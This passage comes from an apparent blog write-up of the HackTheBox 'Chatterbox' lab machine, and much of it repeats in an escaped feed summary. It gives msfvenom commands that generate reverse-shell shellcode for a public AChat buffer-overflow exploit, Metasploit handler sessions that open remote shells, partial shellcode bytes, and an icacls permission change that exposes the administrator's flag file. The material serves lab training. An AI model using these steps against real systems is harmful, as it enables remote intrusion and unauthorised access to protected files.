[*] Starting interaction with 2...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32&amp;gt;whoami
win-ecc1ucer094\medic
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Now we know that the exploit works and that we can successfully get a shell. It may seem like overkill, but it is worth understanding what a potentially unknown exploit does on a local machine before you try it remotely. It saves tons of time debugging why &lt;em&gt;x&lt;/em&gt; or &lt;em&gt;y&lt;/em&gt; isn’t working, and tells you whether the target simply needs a reset because the service crashed, or whether something else strange is going on.&lt;/p&gt;

&lt;h2 id=&quot;getting-shellroottxt&quot;&gt;Getting Shell/Root.txt&lt;/h2&gt;
&lt;p&gt;Now that we know the exploit works, let’s regenerate the shellcode with the same msfvenom command, changing only &lt;code class=&quot;highlighter-rouge&quot;&gt;LHOST&lt;/code&gt; so the reverse shell comes back to our HTB IP.&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~# msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp  LHOST=10.10.15.226 LPORT=8282 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;after executing the modified exploit…&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf &amp;gt; use exploit/multi/handler
msf exploit(multi/handler) &amp;gt; set PAYLOAD windows/shell/reverse_tcp
PAYLOAD =&amp;gt; windows/shell/reverse_tcp
msf exploit(multi/handler) &amp;gt;  set LHOST tun0
LHOST =&amp;gt; tun0
msf exploit(multi/handler) &amp;gt; set LPORT 8282
LPORT =&amp;gt; 8282
msf exploit(multi/handler) &amp;gt; set ExitOnSession False
ExitOnSession =&amp;gt; false
msf exploit(multi/handler) &amp;gt; exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.10.15.226:8282
msf exploit(multi/handler) &amp;gt; [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.74
[*] Command shell session 1 opened (10.10.15.226:8282 -&amp;gt; 10.10.10.74:49178) at 2018-06-14 21:55:43 -0400
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf exploit(multi/handler) &amp;gt; sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32&amp;gt;whoami
chatterbox\alfred
C:\Users\Alfred\Desktop&amp;gt;type user.txt
[redacted]
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;There seemed to be a file permissions misconfiguration on the local &lt;code class=&quot;highlighter-rouge&quot;&gt;Administrator&lt;/code&gt; Desktop folder and the &lt;code class=&quot;highlighter-rouge&quot;&gt;root.txt&lt;/code&gt; file. I assumed this was the intended way to get the &lt;code class=&quot;highlighter-rouge&quot;&gt;root.txt&lt;/code&gt; flag. &lt;code class=&quot;highlighter-rouge&quot;&gt;dir /Q&lt;/code&gt; shows that &lt;code class=&quot;highlighter-rouge&quot;&gt;root.txt&lt;/code&gt; is owned by &lt;code class=&quot;highlighter-rouge&quot;&gt;Alfred&lt;/code&gt;, and on Windows the owner of an object always has the implicit right to change its DACL (WRITE_DAC), even when the ACL grants the owner no read access. So Alfred can use &lt;code class=&quot;highlighter-rouge&quot;&gt;icacls&lt;/code&gt; to grant himself full control of &lt;code class=&quot;highlighter-rouge&quot;&gt;root.txt&lt;/code&gt; and then read it.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;getting root.txt by using icacls to grant full permissions on the file&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;C:\Users\Administrator\Desktop&amp;gt;dir /Q
 Volume in drive C has no label.
 Volume Serial Number is 9034-6528

 Directory of C:\Users\Administrator\Desktop

12/10/2017  07:50 PM    &amp;lt;DIR&amp;gt;          BUILTIN\Administrators .
12/10/2017  07:50 PM    &amp;lt;DIR&amp;gt;          NT AUTHORITY\SYSTEM    ..
12/10/2017  07:50 PM                32 CHATTERBOX\Alfred      root.txt
               1 File(s)             32 bytes
               2 Dir(s)  17,758,883,840 bytes free

C:\Users\Administrator\Desktop&amp;gt;icacls.exe root.txt /grant CHATTERBOX\Alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop&amp;gt;type root.txt
[redacted]
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;</content><author><name>A Medic (@OnlyaMedic)</name></author><category term="writeup" /><category term="pentesting" /><category term="hackthebox" /><summary type="html">Introduction Tools Used. Metasploit Framework Msfvenom Nmap SearchSploit Enumeration Initial Scanning Like with every box, lets start off with an nmap scan against the Chatterbox machine (10.10.10.74)… root@dastinia:~/htb/chatterbox# nmap -T4 -sC -sV -n 10.10.10.74 -oA chatterbox_inital_scan Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 21:50 EDT Stats: 0:01:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 45.00% done; ETC: 21:53 (0:01:28 remaining) Stats: 0:01:16 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 47.00% done; ETC: 21:53 (0:01:25 remaining)Nmap scan report for 10.10.10.74Host is up (0.16s latency). All 1000 scanned ports on 10.10.10.74 are filtered Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 161.17 seconds root@dastinia:~/htb/chatterbox# Interestingly enough, there were no ports alive… There might be some sort of filtering is taking place on the box, or it’s getting destroyed by other HTB users so I ran a slower full port scan against the box. root@dastinia:~/htb/chatterbox# cat chatterbox_min_rate_500.nmap # Nmap 7.70 scan initiated Tue May 22 22:12:31 2018 as: nmap -sC -sV -n -sT -p- --min-rate 500 -oA chatterbox_min_rate_500 10.10.10.74 Nmap scan report for 10.10.10.74 Host is up (0.16s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 9255/tcp open mon? 9256/tcp open tcpwrapped Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
# Nmap done at Tue May 22 22:18:41 2018 -- 1 IP address (1 host up) scanned in 370.95 seconds Interesting we are getting responses on two ports, but with no useful information as to what service is running on the port. I’m going to scan (yet again) to further enumerate what the service is. But this time we are going to run it at a T2 rate in case the firewall is dropping traffic due to speed. root@dastinia:~/htb/chatterbox# nmap -T2 --max-retries 5 -sV -sC -p9255,9256 10.10.10.74 -oA chatterbox_p9255-9256_sc Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 22:34 EDT Nmap scan report for 10.10.10.74 Host is up (0.16s latency). PORT STATE SERVICE VERSION 9255/tcp open http AChat chat system httpd |_http-server-header: AChat |_http-title: Site doesn't have a title. 9256/tcp open achat AChat chat system Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.60 seconds Enumerating Port 9255 (AChat Chat System httpd) If you complete some research on “AChat” you discover a few CVE for the application, including a buffer overflow exploit for AChat version 0.150 beta7, which you can find on searchsploit/exploit-db. After some quick googling, and looking at the AChat project’s sourceforge page you will discover that the last version of Achat to be released was AChat 0.150 beta7. So there’s a pretty high chance that this is version of the software running on Chatterbox. Modifying Exploit ShellCode &amp;amp; Testing Locally One of the first things I pay attention to is the architecture of the machine that this exploit was tested or developed for (in this case Windows 7 32bit),and what the POC exploit code is executing when it triggers. Usually the exploit developer will let you know what versions of “x” the following was tested as working on. For this exploit, the exploit developer generated shellcode to execute the calculator program when the exploit triggers. 
This is pretty useless to us, so we are going to drop-in-replace the exac/calc shellcode for simple reverse shell payload and go from there. I downloaded a copy of the vulnerable AChat program, and ran it on a 64-bit Windows 7 virtual machine. generating windows reverse shell shellcode with msfvenom root@dastinia:~/htb/chatterbox# msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp LHOST=192.168.30.130 LPORT=8282 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/unicode_mixed x86/unicode_mixed succeeded with size 808 (iteration=0) x86/unicode_mixed chosen with final size 808 Payload size: 808 bytes Final size of python file: 3872 bytes buf = &quot;&quot; buf += &quot;\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49&quot; buf += &quot;\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41&quot; buf += &quot;\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41&quot; buf += &quot;\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51&quot; buf += &quot;\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31&quot; buf += &quot;\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41&quot; buf += &quot;\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41&quot; buf += &quot;\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41&quot; buf += &quot;\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41&quot; buf += &quot;\x47\x42\x39\x75\x34\x4a\x42\x4b\x4c\x69\x58\x32\x62&quot; 
buf += &quot;\x49\x70\x39\x70\x6d\x30\x4f\x70\x62\x69\x48\x65\x30&quot; buf += &quot;\x31\x79\x30\x71\x54\x64\x4b\x52\x30\x6c\x70\x42\x6b&quot; ...Snip.... After executing the modified exploit… msf exploit(multi/handler) &amp;gt; set PAYLOAD windows/shell/reverse_tcp PAYLOAD =&amp;gt; windows/shell/reverse_tcp msf exploit(multi/handler) &amp;gt; set LHOST 192.168.30.130 LHOST =&amp;gt; 192.168.30.130 msf exploit(multi/handler) &amp;gt; set LPORT 8282 LPORT =&amp;gt; 8282 msf exploit(multi/handler) &amp;gt; exploit -j -z [*] Exploit running as background job 1. [*] Started reverse TCP handler on 192.168.30.130:8282 [*] Command shell session 2 opened (192.168.30.130:8282 -&amp;gt; 192.168.30.141:49389) at 2018-05-26 16:44:36 -0400 msf exploit(multi/handler) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x86/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 192.168.30.130:8282 -&amp;gt; 192.168.30.141:49388 (192.168.30.141) 2 shell x86/windows 192.168.30.130:8282 -&amp;gt; 192.168.30.141:49389 (192.168.30.141) msf exploit(multi/handler) &amp;gt; sessions -i 2 [*] Starting interaction with 2... Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32&amp;gt;whoami win-ecc1ucer094\medic Now we know that the exploit works &amp;amp; we can successfully get a shell. It may seem like overkill, but I feel like it’s good to understand what a potentially unknown exploit is doing on a local machine before you try exploiting something remotely. It will save tons of time trying to debug why x or y isn’t working, or in determining if the machine simply needs a reset because the service crashed, or there’s other strangeness taking place. Getting Shell/Root.txt So we know the exploit works, so let’s modify our msfvenom command to give us a reverse shell for our HTB IP. 
root@dastinia:~# msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp LHOST=10.10.15.226 LPORT=8282 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python after executing the modified exploit… msf &amp;gt; use exploit/multi/handler msf exploit(multi/handler) &amp;gt; set PAYLOAD windows/shell/reverse_tcp PAYLOAD =&amp;gt; windows/shell/reverse_tcp msf exploit(multi/handler) &amp;gt; set LHOST tun0 LHOST =&amp;gt; tun0 msf exploit(multi/handler) &amp;gt; set LPORT 8282 LPORT =&amp;gt; 8282 msf exploit(multi/handler) &amp;gt; set ExitOnSession False ExitOnSession =&amp;gt; false msf exploit(multi/handler) &amp;gt; exploit -j -z [*] Exploit running as background job 0. [*] Started reverse TCP handler on 10.10.15.226:8282 msf exploit(multi/handler) &amp;gt; [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.10.10.74 [*] Command shell session 1 opened (10.10.15.226:8282 -&amp;gt; 10.10.10.74:49178) at 2018-06-14 21:55:43 -0400 msf exploit(multi/handler) &amp;gt; sessions -i 1 [*] Starting interaction with 1... Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32&amp;gt;whoami chatterbox\alfred C:\Users\Alfred\Desktop&amp;gt;type user.txt [redacted] There seemed to be a file permissions misconfiguration on the local administrators folder, and the root.txt file. I assumed this was the method we were supposed to take to get the root.txt flag. 
root.txt is owned by Alfred so we can use icacls to give full permissions on the root.txt file so we can read it. getting root.txt by using icalcs to grant full permissions on the file C:\Users\Administrator\Desktop&amp;gt;dir /Q Volume in drive C has no label. Volume Serial Number is 9034-6528 Directory of C:\Users\Administrator\Desktop 12/10/2017 07:50 PM &amp;lt;DIR&amp;gt; BUILTIN\Administrators . 12/10/2017 07:50 PM &amp;lt;DIR&amp;gt; NT AUTHORITY\SYSTEM .. 12/10/2017 07:50 PM 32 CHATTERBOX\Alfred root.txt 1 File(s) 32 bytes 2 Dir(s) 17,758,883,840 bytes free C:\Users\Administrator\Desktop&amp;gt;icacls.exe root.txt /grant CHATTERBOX\Alfred:F processed file: root.txt Successfully processed 1 files; Failed processing 0 files C:\Users\Administrator\Desktop&amp;gt;type root.txt [redacted]</summary></entry></feed>